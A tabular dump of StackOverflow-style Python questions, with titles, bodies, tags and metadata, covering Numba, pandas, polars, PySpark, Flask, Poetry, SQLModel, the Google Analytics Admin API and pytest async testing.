| QuestionId | UserId | QuestionTitle | QuestionBody | Tags | CreationDate | AnswerCount | UserExpertiseLevel | UserDisplayName |
|---|---|---|---|---|---|---|---|---|
76,307,173
| 7,509,907
|
Getting 'unsupported array index type unicode_type' error when selecting a column based on condition in Numba with NumPy structured array
|
<p>I am trying to select a column of a structured NumPy array. The column to be selected depends on a condition that will be passed to the function. Numba throws the error below when I try to select the column name based on the condition. Otherwise everything works well.</p>
<p>Basic example:<br />
This works:</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np
import numba
@numba.njit(fastmath=True, cache=True)
def fun(a, b=0):
    c = 'name'
    # if b:
    #     c = 'age'
    return a[c]
a = np.array([('Rex', 9, 81.0), ('Fido', 3, 27.0)],
dtype=[('name', 'U10'), ('age', 'i4'), ('weight', 'f4')])
fun(a)
</code></pre>
<p>This doesn't work:</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np
import numba
@numba.njit(fastmath=True, cache=True)
def fun(a, b=0):
    c = 'name'
    if b:
        c = 'age'
    return a[c]
a = np.array([('Rex', 9, 81.0), ('Fido', 3, 27.0)],
dtype=[('name', 'U10'), ('age', 'i4'), ('weight', 'f4')])
fun(a)
</code></pre>
<p>The error:</p>
<pre><code>---------------------------------------------------------------------------
TypingError Traceback (most recent call last)
c:\Users\User\Workspaces\temp.ipynb Cell 9 in ()
8 return a[c]
10 a = np.array([('Rex', 9, 81.0), ('Fido', 3, 27.0)],
11 dtype=[('name', 'U10'), ('age', 'i4'), ('weight', 'f4')])
---> 13 fun(a)
File ~\AppData\Roaming\Python\Python38\site-packages\numba\core\dispatcher.py:468, in _DispatcherBase._compile_for_args(self, *args, **kws)
464 msg = (f"{str(e).rstrip()} \n\nThis error may have been caused "
465 f"by the following argument(s):\n{args_str}\n")
466 e.patch_message(msg)
--> 468 error_rewrite(e, 'typing')
469 except errors.UnsupportedError as e:
470 # Something unsupported is present in the user code, add help info
471 error_rewrite(e, 'unsupported_error')
File ~\AppData\Roaming\Python\Python38\site-packages\numba\core\dispatcher.py:409, in _DispatcherBase._compile_for_args..error_rewrite(e, issue_type)
407 raise e
408 else:
--> 409 raise e.with_traceback(None)
TypingError: Failed in nopython mode pipeline (step: nopython frontend)
No implementation of function Function() found for signature:
>>> getitem(unaligned array(Record(name[type=[unichr x 10];offset=0],age[type=int32;offset=40],weight[type=float32;offset=44];48;False), 1d, C), unicode_type)
There are 22 candidate implementations:
- Of which 20 did not match due to:
Overload of function 'getitem': File: : Line N/A.
With argument(s): '(unaligned array(Record(name[type=[unichr x 10];offset=0],age[type=int32;offset=40],weight[type=float32;offset=44];48;False), 1d, C), unicode_type)':
No match.
- Of which 2 did not match due to:
Overload in function 'GetItemBuffer.generic': File: numba\core\typing\arraydecl.py: Line 166.
With argument(s): '(unaligned array(Record(name[type=[unichr x 10];offset=0],age[type=int32;offset=40],weight[type=float32;offset=44];48;False), 1d, C), unicode_type)':
Rejected as the implementation raised a specific error:
NumbaTypeError: unsupported array index type unicode_type in [unicode_type]
raised from C:\Users\User\AppData\Roaming\Python\Python38\site-packages\numba\core\typing\arraydecl.py:72
During: typing of intrinsic-call at C:\Users\User\AppData\Local\Temp\ipykernel_37200\1621110578.py (8)
File "..\..\..\..\..\AppData\Local\Temp\ipykernel_37200\1621110578.py", line 8:
</code></pre>
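<p>For context (a sketch, not part of the original question): Numba can only type structured-array field access when the field name is a compile-time constant, so a runtime <code>unicode_type</code> index is rejected. One assumed workaround is to resolve the field name in plain Python before any jitted code runs; <code>pick_field</code> below is an illustrative plain-Python stand-in, not the author's jitted function.</p>

```python
import numpy as np

a = np.array([('Rex', 9, 81.0), ('Fido', 3, 27.0)],
             dtype=[('name', 'U10'), ('age', 'i4'), ('weight', 'f4')])

def pick_field(a, b=0):
    # Resolve the field name outside jitted code, where runtime strings
    # are fine; the selected column can then be passed to a jitted kernel.
    c = 'age' if b else 'name'
    return a[c]
```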
|
<python><numpy><numba><structured-array>
|
2023-05-22 14:22:02
| 1
| 950
|
D.Manasreh
|
76,307,108
| 1,841,839
|
How to set the page size with the account summaries list in the Google Analytics Admin API
|
<p>The <a href="https://developers.google.com/analytics/devguides/config/admin/v1/rest/v1beta/accountSummaries/list?apix_params=%7B%22pageSize%22%3A1%7D" rel="nofollow noreferrer">Method: accountSummaries.list</a> method has an optional parm called page size</p>
<blockquote>
<p>pageSize integer</p>
<p>The maximum number of AccountSummary resources to return. The service may return fewer than this value, even if there are additional pages. If unspecified, at most 50 resources will be returned. The maximum value is 200; (higher values will be coerced to the maximum)</p>
</blockquote>
<p>In the following example, if I don't set the page size then the code runs and gets all the rows. However, if I do set the page size then I get an error saying that this option does not exist.</p>
<pre><code>from google.analytics.admin import AnalyticsAdminServiceClient
# pip install google-analytics-admin
CREDENTIALS_FILE_PATH = r'C:\credentials.json'  # raw string keeps the backslash literal
from google_auth_oauthlib import flow
def list_accounts(credentials=None):
    """Lists the available Google Analytics accounts."""
    # Using a default constructor instructs the client to use the credentials
    # specified in the GOOGLE_APPLICATION_CREDENTIALS environment variable.
    client = AnalyticsAdminServiceClient(credentials=credentials)

    # Make the request
    results = client.list_account_summaries(page_size=1)  # ERROR HERE

    # Displays the configuration information for all Google Analytics accounts
    # available to the authenticated user.
    print("Result:")
    for account in results:
        print(account)

def get_credentials():
    """Creates an OAuth2 credentials instance."""
    appflow = flow.InstalledAppFlow.from_client_secrets_file(
        CREDENTIALS_FILE_PATH,
        scopes=["https://www.googleapis.com/auth/analytics.readonly"],
    )
    # TODO(developer): Update the line below to set the `launch_browser` variable.
    # The `launch_browser` boolean variable indicates if a local server is used
    # as the callback URL in the auth flow. A value of `True` is recommended,
    # but a local server does not work if accessing the application remotely,
    # such as over SSH or from a remote Jupyter notebook.
    launch_browser = True

    if launch_browser:
        appflow.run_local_server()
    else:
        # Note: yes, this is deprecated. It will work if you change the redirect
        # URI given to you from urn:ietf:wg:oauth:2.0:oob to http://127.0.0.1.
        # The client library team needs to fix this.
        appflow.run_console()
    return appflow.credentials

def main():
    credentials = get_credentials()
    list_accounts(credentials)

if __name__ == "__main__":
    main()
</code></pre>
<blockquote>
<p>TypeError: list_account_summaries() got an unexpected keyword argument 'page_size'</p>
</blockquote>
<p>I have tried <code>pagesize</code>, <code>page_size</code>, and <code>pageSize</code>; nothing seems to work. I have also dug around in the GitHub project, and it seems it should be <code>page_size</code>, but it's not working.</p>
<h1>Note on Alpha and beta versions.</h1>
<p>The alpha and beta versions appear to have allowed for:</p>
<pre><code>request = client.ListAccountSummariesRequest()
request.page_size = 1
results = client.list_account_summaries(request)
</code></pre>
<p>With the full version, this results in:</p>
<blockquote>
<p>AttributeError: 'AnalyticsAdminServiceClient' object has no attribute 'ListAccountSummariesRequest'</p>
</blockquote>
|
<python><google-cloud-platform><google-api><google-analytics-api><google-api-python-client>
|
2023-05-22 14:15:30
| 1
| 118,263
|
Linda Lawton - DaImTo
|
76,307,021
| 6,564,294
|
Shuffle pandas column while avoiding a condition
|
<p>I have a dataframe that shows 2 sentences are similar. This dataframe has a 3rd relationship column which also contains some strings. This 3rd column shows how similar the texts are. For instance: <br>
P for Plant, V for Vegetables and F for Fruits. Also, <br>
A for Animal, I for Insects and M for Mammals.</p>
<pre><code>data = {'Text1': ["All Vegetables are Plants",
"Cows are happy",
"Butterflies are really beautiful",
"I enjoy Mangoes",
"Vegetables are green"],
'Text2': ['Some Plants are good Vegetables',
'Cows are enjoying',
'Beautiful butterflies are delightful to watch',
'Mango pleases me',
'Spinach is green'],
'Relationship': ['PV123', 'AM4355', 'AI784', 'PF897', 'PV776']}
df = pd.DataFrame(data)
print(df)
>>>
</code></pre>
<div class="s-table-container">
<table class="s-table">
<thead>
<tr>
<th style="text-align: right;"></th>
<th style="text-align: left;">Text1</th>
<th style="text-align: left;">Text2</th>
<th style="text-align: left;">Relationship</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: right;">0</td>
<td style="text-align: left;">All Vegetables are Plants</td>
<td style="text-align: left;">Some Plants are good Vegetables</td>
<td style="text-align: left;">PV123</td>
</tr>
<tr>
<td style="text-align: right;">1</td>
<td style="text-align: left;">Cows eat grass</td>
<td style="text-align: left;">Grasses are cow's food</td>
<td style="text-align: left;">AM4355</td>
</tr>
<tr>
<td style="text-align: right;">2</td>
<td style="text-align: left;">Butterflies are really beautiful</td>
<td style="text-align: left;">Beautiful butterflies are delightful to watch</td>
<td style="text-align: left;">AI784</td>
</tr>
<tr>
<td style="text-align: right;">3</td>
<td style="text-align: left;">I enjoy Mangoes</td>
<td style="text-align: left;">Mango pleaases me</td>
<td style="text-align: left;">PF897</td>
</tr>
<tr>
<td style="text-align: right;">4</td>
<td style="text-align: left;">Vegetables are green</td>
<td style="text-align: left;">Spinach is green</td>
<td style="text-align: left;">PV776</td>
</tr>
</tbody>
</table>
</div>
<p>I desire to train a BERT model on this data. However, I also need to create examples of dissimilar sentences. My solution is to give a label of 1 to the dataset as it is and then shuffle <code>Text2</code> and give it a label of 0. The problem is that I can't really create good dissimilar examples just by random shuffling without making use of the "Relationship" column.</p>
<p>How can I shuffle my data so I can avoid texts like <code>All Vegetables are Plants</code> and <code>Spinach is green</code> appearing on the same row on <code>Text1</code> and <code>Text2</code> respectively?</p>
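<p>One possible sketch (not from the question, and the helper name and one-character domain key are assumptions): treat the leading letter of <code>Relationship</code> (P for plant topics, A for animal topics) as a coarse domain key, and for each row sample a <code>Text2</code> from a row with a different key, so dissimilar pairs never come from the same domain.</p>

```python
import numpy as np
import pandas as pd

data = {'Text1': ["All Vegetables are Plants", "Cows are happy",
                  "Butterflies are really beautiful", "I enjoy Mangoes",
                  "Vegetables are green"],
        'Text2': ['Some Plants are good Vegetables', 'Cows are enjoying',
                  'Beautiful butterflies are delightful to watch',
                  'Mango pleases me', 'Spinach is green'],
        'Relationship': ['PV123', 'AM4355', 'AI784', 'PF897', 'PV776']}
df = pd.DataFrame(data)

def mismatched_pairs(df, seed=0):
    # Pair each Text1 with a Text2 whose Relationship starts with a
    # different domain letter, and label the pair 0 (dissimilar).
    rng = np.random.default_rng(seed)
    keys = df['Relationship'].str[0]
    rows = []
    for i in range(len(df)):
        candidates = df.index[keys != keys.iloc[i]].to_numpy()
        j = rng.choice(candidates)
        rows.append((df['Text1'].iloc[i], df['Text2'].iloc[j], 0))
    return pd.DataFrame(rows, columns=['Text1', 'Text2', 'label'])

neg = mismatched_pairs(df)
```

The negative examples can then be concatenated with the original label-1 rows before training.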
|
<python><pandas><dataframe><shuffle><sentence-similarity>
|
2023-05-22 14:05:06
| 2
| 324
|
Chukwudi
|
76,307,018
| 4,858,605
|
Integrating custom pytorch backend with triton + AWS sagemaker
|
<p>I have a custom Python backend that works well with AWS SageMaker MMS (Multi Model Server) using an S3 model repository. I want to adapt this backend to work with the Triton Python backend.
I have an example Dockerfile that runs the Triton server with my requirements.</p>
<p>I also have a model_handler.py file that is based on <a href="https://github.com/triton-inference-server/python_backend/blob/main/examples/pytorch/model.py" rel="nofollow noreferrer">this example</a>, but I do not understand where to place this file to test its functionality. Using classic SageMaker with MMS, for example, I would import the handler in the dockerd-entrypoint.</p>
<p>However, with Triton, I do not understand where this file should be imported. I understand I can use pytriton, but there is absolutely no documentation that I can comprehend. Can someone point me in the right direction, please?</p>
|
<python><amazon-web-services><amazon-sagemaker><triton>
|
2023-05-22 14:04:48
| 1
| 2,462
|
toing_toing
|
76,306,898
| 1,504,016
|
Dynamically define class with inheritance and static attributes (sqlmodel / sqlalchemy metaclasses)
|
<p>I have the following class definition that I would like to make dynamic:</p>
<pre><code>class SQLModel_custom(SQLModel, registry=self.mapper_registry):
metadata = MetaData(schema=self.schema)
</code></pre>
<p>I've tried something like that:</p>
<pre><code>type('SQLModel_custom', (SQLModel, self.mapper_registry), {'metadata': MetaData(schema=self.schema)})
</code></pre>
<p>But this gives me the following error:</p>
<pre><code>TypeError: metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases
</code></pre>
<p>Maybe the issue comes from the fact that I'm not using <code>registry=</code> when defining parent classes in the dynamic version, but I don't see how I could achieve the same result.
Any advice? Thank you!</p>
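<p>A generic sketch of the likely direction (not SQLModel-specific; <code>Meta</code> and <code>Base</code> below are stand-ins for SQLModel's metaclass machinery): dynamic class creation must go through the base class's own metaclass rather than plain <code>type</code>, and class keywords such as <code>registry=</code> are passed as keyword arguments to that metaclass call instead of being listed in the bases tuple.</p>

```python
class Meta(type):
    # Stand-in for a metaclass (like SQLModel's) that accepts class keywords.
    def __new__(mcls, name, bases, ns, **kwargs):
        cls = super().__new__(mcls, name, bases, ns)
        cls._class_kwargs = kwargs  # e.g. {'registry': ...}
        return cls

    def __init__(cls, name, bases, ns, **kwargs):
        # Consume the keywords so type.__init__ is not bothered by them.
        super().__init__(name, bases, ns)

class Base(metaclass=Meta):
    pass

# Use the base's own metaclass, not plain `type`, and pass `registry=`
# as a keyword instead of putting the registry in the bases tuple.
Custom = type(Base)('Custom', (Base,), {'metadata': 'my_schema'},
                    registry='my_registry')
```

For the question's case, the analogous call would be along the lines of `type(SQLModel)('SQLModel_custom', (SQLModel,), {...}, registry=...)`, though the exact keywords SQLModel's metaclass accepts should be checked against its source.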
|
<python><class><dynamic><metaclass><sqlmodel>
|
2023-05-22 13:51:40
| 1
| 2,649
|
ibi0tux
|
76,306,842
| 3,521,180
|
Why am I not able to pass two status Ids in my GET method?
|
<p>I have a scenario wherein I need to compare two simulations coming from the same table, i.e. say simulation_1 and simulation_2. For every completed simulation there would be a unique id "sim_sttus_id" generated in "__TABLE1", as shown in the code snippet. Below are the code snippets for reference.</p>
<pre><code>class SimRes:
    __TABLE1 = 'SIM_STTUS'
    __TABLE2 = 'COMP_SIM_CONF'
    __TABLE3 = 'COMP'

    def __init__(self, prog: str, plan: int, versn: float, sim_sttus: int, tab_name: str = None, comp_id: int = None):
        super().__init__(prog)
        self.__prog = prog
        self.__plan = plan
        self.__versn = versn
        self.__sim_sttus = sim_sttus
        self.__tab_name = tab_name
        self.__comp_id = comp_id
        self.__sim_sttus_tbl = Table(f'{self.schema_name}.{self.__TABLE1}')
        self.__comp_sim_conf_tbl = Table(f'{self.schema_name}.{self.__TABLE2}')
        self.__comp_tbl = Table(f'{self.schema_name}.{self.__TABLE3}')

    def get_select_comp(self):
        try:
            SSD = self.__sim_sttus_tbl
            CSCD = self.__comp_sim_conf_tbl
            ICD = self.__comp_tbl
            query = SnowflakeQuery.from_(CSCD) \
                .join(SSD).on_field('PLAN_SIM_CONF_ID') \
                .join(ICD).on_field('COMP_ID') \
                .select(CSCD.COMP_SIM_CONF_ID, SSD.sim_sttus_id, CSCD.PLAN_SIM_CONF_ID,
                        CSCD.COMP_ID, ICD.COMP_NAME) \
                .where(Criterion.all([SSD.sim_sttus_id == self.sim_sttus_id])) \
                .get_sql()
            comp_lst = self.execute_query(query)
            if isinstance(comp_lst['result'], str):
                raise QueryException(comp_lst)
            return comp_lst["result"]
        except Exception as e:
            raise
</code></pre>
<p>My challenge lies in the function below, where I need to compare:</p>
<pre><code>    def compare_sim_sttus(self, sttus_id1, sttus_id2):
        try:
            selected_comp = self.get_select_comp()
            matching_comp = []
            for component in selected_comp:
                if component['sim_sttus_id'] == sttus_id1:
                    comp_id = component['comp_id']
                    comp_name = component['comp_name']
                    if self.__check_comp_sttus(comp_id, sttus_id2):
                        matching_comp.append((comp_id, comp_name))
            return matching_comp
        except Exception as e:
            raise

    def __check_comp_sttus(self, comp_id, sttus_id):
        try:
            query = SnowflakeQuery \
                .from_(self.__sim_sttus_tbl) \
                .where(self.__sim_sttus_tbl.sim_sttus_id == sttus_id) \
                .where(self.__comp_tbl.COMP_ID == comp_id) \
                .get_sql()
            comp_sttus = self.execute_query(query)
            return len(comp_sttus['result']) > 0
        except Exception as e:
            raise
</code></pre>
<ul>
<li><p>"<code>get_select_comp</code>" method is using PyPika query to get list of <code>comp_name</code> and <code>comp_id</code> based on <code>sim_sttus_id</code>. Its working as per the method requirement.</p>
</li>
<li><p><code>compare_sim_sttus</code> internally calls the existing "get_select_comp" method to retrieve the list of selected components. Then, we iterate over each component and check whether its sim_sttus_id matches sttus_id1. If it does, we retrieve the comp_id and comp_name and call the "check_comp_sttus" method to verify whether the same comp_id exists for sttus_id2. If it does, we add the component to the matching_comp list.</p>
</li>
</ul>
<p>Below is the endpoint code.</p>
<pre><code>import traceback
from flasgger import swag_from
from flask_restful import Resource
from pathlib import Path
from <path_to_module> import SimRes

__all__ = ['SimRes']

class SimResResource(Resource):
    @classmethod
    def get(cls, prog: str, plan: int, versn: float, sim_sttus_id: int):
        try:
            sttus_id1 = 1  # Set the first sim_sttus_id
            sttus_id2 = 2  # Set the second sim_sttus_id
            components_compare = SimRes(prog=prog, plan=plan, versn=versn, sim_sttus_id=sim_sttus_id)
            response = components_compare.compare_sim_sttus(sttus_id1, sttus_id2)
            return success_response(response)
        except Exception as e:
            app.logger.error(f'{str(e)}: {traceback.format_exc()}')
            return error_response(e)
</code></pre>
<p>As you can see, in the above GET method I have passed hard-coded values for <code>sttus_id1</code> and <code>sttus_id2</code>. But I need to execute the API in Postman, and I want to pass <code>sttus_id1</code> and <code>sttus_id2</code> in the Postman request and get the response.</p>
<p>Below is the endpoint route:</p>
<pre><code>/programs/<prog>/plans/<plan>/<versn>/sim_compare.
</code></pre>
<p>I am not able to figure out how to do that in my endpoint. I couldn't pass <code>"sim_sttus_id"</code> twice in my endpoint path, as it gives me an error saying <code>"identical col name"</code>, and when I pass <code><sttus_id1>/<sttus_id2></code> in the endpoint path, I get the error below.</p>
<pre><code>{
    "error": "__init__() got an unexpected keyword argument 'sttus_id1'",
    "success": false
}
</code></pre>
<p>So, I tried adding the two variables sttus_id1 and sttus_id2 to the class constructor, removed them as parameters from the <code>compare_sim_sttus</code> method, and referenced them via "self" at the required positions. In the endpoint class I added them as parameters in the GET method, but no luck; when I did, I got the error below:</p>
<pre><code> "error": "__init__() missing 1 required positional argument: 'sim_sttus_id'",
"success": false
}
</code></pre>
<p>The modified endpoint path is <code>/programs/<prog_id>/plans/<plan>/<versn>/<sttus_id1>/<sttus_id2>/sim_compare</code>.
I cannot pass sim_sttus_id in the endpoint, as said earlier. Kindly suggest.</p>
|
<python><python-3.x><flask><flask-restful><pypika>
|
2023-05-22 13:45:23
| 0
| 1,150
|
user3521180
|
76,306,463
| 20,726,966
|
How can I deploy a Python script to Heroku for performing dynamic sum, division and multiplication on-demand?
|
<p>I am trying to deploy a script to Heroku that, for example, returns the sum, quotient, and product of two numbers that are passed dynamically.</p>
<p>script.py</p>
<pre><code>def sum(a, b):
    ans = a + b
    print(ans)
    return ans

def mul(a, b):
    ans = a * b
    print(ans)
    return ans

def div(a, b):
    ans = a / b
    print(ans)
    return ans
</code></pre>
<p>I would like this script to be called on demand, specifying which function to call and passing its parameters. I am fairly new to Heroku, so any advice is a plus. Is this possible on Heroku? If not, what other platforms should I be looking at?</p>
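<p>One common pattern (a sketch, under the assumption that a small Flask app is acceptable; Heroku runs web processes declared in a Procfile, e.g. <code>web: gunicorn app:app</code>): wrap the functions in an HTTP endpoint so the operation and the operands are passed per request. The route and parameter names here are illustrative.</p>

```python
from flask import Flask, jsonify, request

app = Flask(__name__)

# Map an operation name in the URL to the corresponding function.
OPS = {
    'sum': lambda a, b: a + b,
    'mul': lambda a, b: a * b,
    'div': lambda a, b: a / b,
}

@app.route('/<op>')
def calculate(op):
    # e.g. GET /sum?a=2&b=3 -> {"result": 5.0}
    if op not in OPS:
        return jsonify(error='unknown operation'), 404
    a = float(request.args.get('a', 0))
    b = float(request.args.get('b', 0))
    return jsonify(result=OPS[op](a, b))
```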
|
<python><heroku>
|
2023-05-22 13:00:00
| 1
| 318
|
Homit Dalia
|
76,306,376
| 9,488,023
|
Compare similar spelling in Pandas dataframe column but different value in another column
|
<p>Let's say I have a Pandas dataframe in Python that looks something like this:</p>
<pre><code>import pandas as pd

df_test = pd.DataFrame(data=None, columns=['file', 'number'])
df_test.file = ['washington_142', 'washington_287', 'chicago_453', 'chicago_221', 'chicago_345', 'seattle_976', 'seattle_977', 'boston_367', 'boston 098']
df_test.number = [20, 21, 33, 34, 33, 45, 45, 52, 52]
</code></pre>
<p>What I want to find out from this dataset are those strings in 'file' that start with the same exact letters (maybe 50% of the string at least), but that do not have the same corresponding value in the 'number' column. In this example, it means I would want to create a new dataframe that finds:</p>
<pre><code>'washington_142', 'washington_287', 'chicago_453', 'chicago_221', 'chicago_345'
</code></pre>
<p>But none of the others, since they have the same 'number' when the spelling starts with the same string. I know there is a function <code>difflib.get_close_matches</code>, but I am not sure how to implement it to check against the other column in the dataframe. Any advice or help is really appreciated!</p>
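<p>One sketch of an answer (an assumption: the leading letters before the digits are a good-enough proxy for "starts with the same exact letters", sidestepping <code>difflib</code> entirely): group on that stem and keep only the groups whose numbers disagree.</p>

```python
import pandas as pd

df_test = pd.DataFrame({
    'file': ['washington_142', 'washington_287', 'chicago_453', 'chicago_221',
             'chicago_345', 'seattle_976', 'seattle_977', 'boston_367',
             'boston 098'],
    'number': [20, 21, 33, 34, 33, 45, 45, 52, 52],
})

# The stem is the run of leading letters before the separator/digits.
stem = df_test['file'].str.extract(r'^([a-z]+)', expand=False)
# Keep rows whose stem group contains more than one distinct number.
result = df_test[df_test.groupby(stem)['number'].transform('nunique') > 1]
```

For genuinely fuzzy prefixes (typos in the city name itself), the stems could instead be clustered with `difflib.get_close_matches` before grouping.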
|
<python><pandas><dataframe><compare>
|
2023-05-22 12:49:44
| 2
| 423
|
Marcus K.
|
76,306,172
| 2,928,970
|
Create numpy array reusing memory of other array
|
<p>I have following code:</p>
<pre><code>import numpy as np

a = np.zeros(N)
b = np.tile(a, [m, n])
....
a[4] = 5 # just changing some values inside a
b = np.tile(a, [m, n])
</code></pre>
<p>In the second assignment to <code>b</code>, can the previous memory of <code>b</code> be overwritten during this procedure instead of creating a new array and then assigning it to <code>b</code>? I understand that the memory of the previous <code>b</code> will be garbage collected soon afterwards, but I want a more performant implementation, since <code>N</code>, <code>m</code>, <code>n</code> can be large in my use case.</p>
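<p>One sketch of reusing the buffer (assuming the shapes stay fixed between calls): allocate <code>b</code> once, then write subsequent tilings into it with slice assignment, which avoids re-allocating the full <code>(m, N*n)</code> array each time. The helper name is illustrative; a small temporary row of size <code>N*n</code> is still created by <code>np.tile</code>.</p>

```python
import numpy as np

N, m, n = 4, 2, 3
a = np.zeros(N)
b = np.tile(a, [m, n])          # allocated once, shape (m, N * n)

def retile_into(a, b, n):
    # Overwrite b in place: np.tile(a, n) is a single row that
    # broadcasts over all m rows of b during the assignment.
    b[...] = np.tile(a, n)
    return b

a[2] = 5.0                      # change some values inside a
retile_into(a, b, n)
```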
|
<python><numpy><memory-management>
|
2023-05-22 12:23:51
| 2
| 1,395
|
hovnatan
|
76,306,121
| 2,473,382
|
Poetry: build a package with a non-standard directory structure
|
<p>I created a repo with this non-standard structure:</p>
<pre><code>- src
- resources
-- a.py
-- b.py ...
</code></pre>
<p>I want to make a package out of it (let's call it <code>pack</code>).</p>
<p>In my pyproject.toml, the relevant lines are:</p>
<pre class="lang-ini prettyprint-override"><code>[tool.poetry]
name = "pack"
include=[{include="src"}]
</code></pre>
<p>Then after a <code>pip install</code> everything is installed under src. Using it would mean <code>from src import ...</code> not <code>from pack import ...</code>.</p>
<p>If I follow the standard tree (everything under src/pack), then it works as expected.</p>
<p><strong>Question</strong></p>
<p>Is there a way, with my tree, to have the package built so as <code>from pack import ...</code> works?</p>
|
<python><python-packaging><python-poetry>
|
2023-05-22 12:18:16
| 1
| 3,081
|
Guillaume
|
76,306,118
| 10,164,750
|
Dropping a column based on the value of another in PySpark
|
<p>I am trying to build a method which takes a dataframe as input and returns another dataframe as output after checking a certain condition.</p>
<p>If the <code>exception_type</code> column contains <code>FILE_REJECT</code>, it <code>drops</code> the <code>file_name</code> column, otherwise it does not.</p>
<p>I have provided various input and output to the method. Please help me build the method. Thank you.</p>
<pre><code>Input
+------------+---------------+-------------+----------------+---------+--------------+--------------+
| file_name|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAW0001| SUSPENSE|
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0006| REC_REJECT|
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| | |
+------------+---------------+-------------+----------------+---------+--------------+--------------+
+------------+---------------+-------------+----------------+---------+--------------+--------------+
| file_name|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
|KKAR0523.ccn| zzzzzzzz| yyyyyyyy| 2001-12-22| SHR| | |
|KKAR0523.ccn| zzzzzzzz| yyyyyyyy| 2001-12-22| SHR| CHAR0001| FILE_REJECT|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
+------------+---------------+-------------+----------------+---------+--------------+--------------+
| file_name|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0002| FILE_REJECT|
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0001| FILE_REJECT|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
</code></pre>
<pre><code>Output
+------------+---------------+-------------+----------------+---------+--------------+--------------+
| file_name|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+------------+---------------+-------------+----------------+---------+--------------+--------------+
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAW0001| SUSPENSE|
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0006| REC_REJECT|
|KKAR0523.ccn| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| | |
+------------+---------------+-------------+----------------+---------+--------------+--------------+
+---------------+-------------+----------------+---------+--------------+--------------+
|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+---------------+-------------+----------------+---------+--------------+--------------+
| zzzzzzzz| yyyyyyyy| 2001-12-22| SHR| | |
| zzzzzzzz| yyyyyyyy| 2001-12-22| SHR| CHAR0001| FILE_REJECT|
+---------------+-------------+----------------+---------+--------------+--------------+
+---------------+-------------+----------------+---------+--------------+--------------+
|register_number|jacket_number|annual_return_dt|data_type|exception_code|exception_type|
+---------------+-------------+----------------+---------+--------------+--------------+
| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0002| FILE_REJECT|
| xxxxxxxx| yyyyyyyy| 2001-12-22| SHR| CHAR0001| FILE_REJECT|
+---------------+-------------+----------------+---------+--------------+--------------+
</code></pre>
<p>Thank you.</p>
|
<python><apache-spark><pyspark>
|
2023-05-22 12:18:01
| 1
| 331
|
SDS
|
76,306,096
| 12,633,371
|
polars: use the Expression API with a DataFrame's rows
|
<p>I am a new <code>polars</code> user and I want to apply a function in every <code>polars DataFrame</code> row. In <code>pandas</code> I would use the <code>apply</code> function specifying that the input of the function is the <code>DataFrame</code>'s row instead of the <code>DataFrame</code>'s column(s).</p>
<p>I saw the <code>apply</code> function of the polars library, and the documentation says it is preferable, because it is much more efficient, to use the Expression API instead of calling <code>apply</code> on a polars <code>DataFrame</code>. The documentation has examples of the Expression API with the <code>select</code> function, but <code>select</code> is used with the <code>DataFrame</code>'s columns. Is there a way to use the Expression API with the rows of the <code>DataFrame</code>?</p>
<p><strong>Edit for providing an example</strong></p>
<p>I have a <code>DataFrame</code> with this structure</p>
<pre><code>l=[(1,2,3,4,22,23,None,None),(5,6,8,10,None,None,None,None)]
df=pl.DataFrame(data=l, orient='row')
</code></pre>
<p>i.e. a <code>DataFrame</code> in which, from some column onward, each row has <code>None</code> values until the end. In this example, in the first row the <code>None</code> values start at column 6, while in the second, they start at column 4.</p>
<p>What I want to do is to find the most efficient polars way to turn this <code>DataFrame</code> into a <code>DataFrame</code> with only three columns, where the first column is the first element of the row, the second column is the second element of the row, and the third will have as a list all the other elements of the following columns that are not <code>None</code>.</p>
|
<python><dataframe><python-polars>
|
2023-05-22 12:15:13
| 1
| 603
|
exch_cmmnt_memb
|
76,306,054
| 10,532,894
|
PytestUnhandledCoroutineWarning: async def functions are not natively supported and have been skipped
|
<p>I'm building a Python project using <code>poetry</code>.
I have created a test file and am using the following code from the examples to test asynchronously:</p>
<pre><code>
import httpx
import respx

@respx.mock
async def test_async_decorator():
    async with httpx.AsyncClient() as client:
        route = respx.get("https://example.org/")
        response = await client.get("https://example.org/")
        assert route.called
        assert response.status_code == 200
</code></pre>
<p>When I run <code>poetry run pytest</code> or simply <code>pytest</code>, I'm getting the following warning:</p>
<pre><code>
test_gsx.py::test_async_decorator
/Users/krishna/Library/Caches/pypoetry/virtualenvs/geoserverx-Yc0Bl2cH-py3.11/lib/python3.11/site-packages/_pytest/python.py:183: PytestUnhandledCoroutineWarning: async def functions are not natively supported and have been skipped.
You need to install a suitable plugin for your async framework, for example:
- anyio
- pytest-asyncio
- pytest-tornasync
- pytest-trio
- pytest-twisted
warnings.warn(PytestUnhandledCoroutineWarning(msg.format(nodeid)))
-- Docs: https://docs.pytest.org/en/stable/how-to/capture-warnings.html
</code></pre>
<p>My pyproject.toml file has the following:</p>
<pre><code>
[tool.poetry.group.dev.dependencies]
pytest = "^7.1.2"
respx = "^0.20.1"
mypy = "^0.960"
black = "^22.3.0"
isort = "^5.10.1"
pytest-asyncio = "^0.21.0"
anyio = {extras = ["trio"], version = "^3.3.4"}
</code></pre>
|
<python><asynchronous><pytest><python-poetry>
|
2023-05-22 12:09:41
